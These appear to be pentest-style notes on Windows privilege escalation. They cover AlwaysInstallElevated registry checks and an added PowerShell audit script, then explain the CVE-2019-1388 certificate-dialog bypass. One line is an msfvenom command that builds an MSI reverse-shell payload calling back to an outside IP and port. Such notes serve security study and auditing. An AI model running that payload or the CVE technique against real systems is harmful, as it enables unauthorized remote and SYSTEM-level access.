https://lolbas-project.github.io/
Check the Windows Installer policy keys:
reg query HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Installer
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer
msfvenom -p windows/shell_reverse_tcp lhost=10.10.14.3 lport=9443 -f msi > aie.msi
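The registry check above, written as a defender's audit. This is an added PowerShell example, not part of the original notes. It assumes the value of interest under both Installer policy keys is AlwaysInstallElevated, which the notes do not name; the function name Get-InstallerElevationPolicy and the output property names are hypothetical.

```powershell
# Added example: audit the Windows Installer policy keys queried above.
# Assumption: the value being checked is AlwaysInstallElevated (REG_DWORD).
# Function and property names are hypothetical, chosen for this example.

function Get-InstallerElevationPolicy {
    [CmdletBinding()]
    param()

    $subKey = 'Software\Policies\Microsoft\Windows\Installer'
    $hives  = [ordered]@{
        HKCU = "HKCU:\$subKey"
        HKLM = "HKLM:\$subKey"
    }

    $values = [ordered]@{}
    foreach ($name in $hives.Keys) {
        # A missing key or value means the policy is not configured in that hive.
        $item = Get-ItemProperty -Path $hives[$name] -Name AlwaysInstallElevated `
                    -ErrorAction SilentlyContinue
        $values[$name] = if ($null -ne $item) { [int]$item.AlwaysInstallElevated } else { $null }
    }

    [pscustomobject]@{
        HKCU      = $values.HKCU
        HKLM      = $values.HKLM
        # Windows Installer only elevates MSI installs when the value is 1 in BOTH hives.
        Effective = ($values.HKCU -eq 1 -and $values.HKLM -eq 1)
        # Only one hive set: not effective on its own, but worth cleaning up.
        Partial   = (($values.HKCU -eq 1) -xor ($values.HKLM -eq 1))
    }
}

$result = Get-InstallerElevationPolicy
$result | Format-List

if ($result.Effective) {
    Write-Warning ('AlwaysInstallElevated is active in both hives: MSI packages install ' +
                   'with SYSTEM privileges for any user. Set both values to 0 or remove them.')
}
elseif ($result.Partial) {
    Write-Warning 'AlwaysInstallElevated is set in one hive only; remove the leftover value.'
}
```

HKCU reflects only the account running the script, so run it in the context of the user being assessed.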
CVE-2019-1388 was a privilege escalation vulnerability in the Windows Certificate Dialog, which did not properly enforce user privileges. The issue was in the UAC mechanism, which presented an option to show information about an executable's certificate, opening the Windows certificate dialog when a user clicks the link. The Issued By field in the General tab is rendered as a hyperlink if the binary is signed with a certificate that has Object Identifier (OID) 1.3.6.1.4.1.311.2.1.10. This OID value is identified in the wintrust.h header as SPC_SP_AGENCY_INFO_OBJID, which is the SpcSpAgencyInfo field in the Details tab of the certificate dialog. If it is present, a hyperlink included in the field will render in the General tab. This vulnerability can be exploited easily using an old Microsoft-signed executable (hhupd.exe) that contains a certificate with the SpcSpAgencyInfo field populated with a hyperlink.
Vulnerable Windows versions: https://web.archive.org/web/20210620053630/https://gist.github.com/gentilkiwi/802c221c0731c06c22bb75650e884e5a
Patched in November 2019.